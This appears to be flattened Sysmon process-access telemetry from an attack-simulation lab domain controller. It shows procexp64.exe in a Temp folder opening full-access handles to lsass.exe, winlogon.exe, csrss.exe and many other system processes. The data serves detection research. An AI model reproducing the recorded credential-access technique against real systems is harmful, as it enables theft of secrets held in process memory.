15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:40.345{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 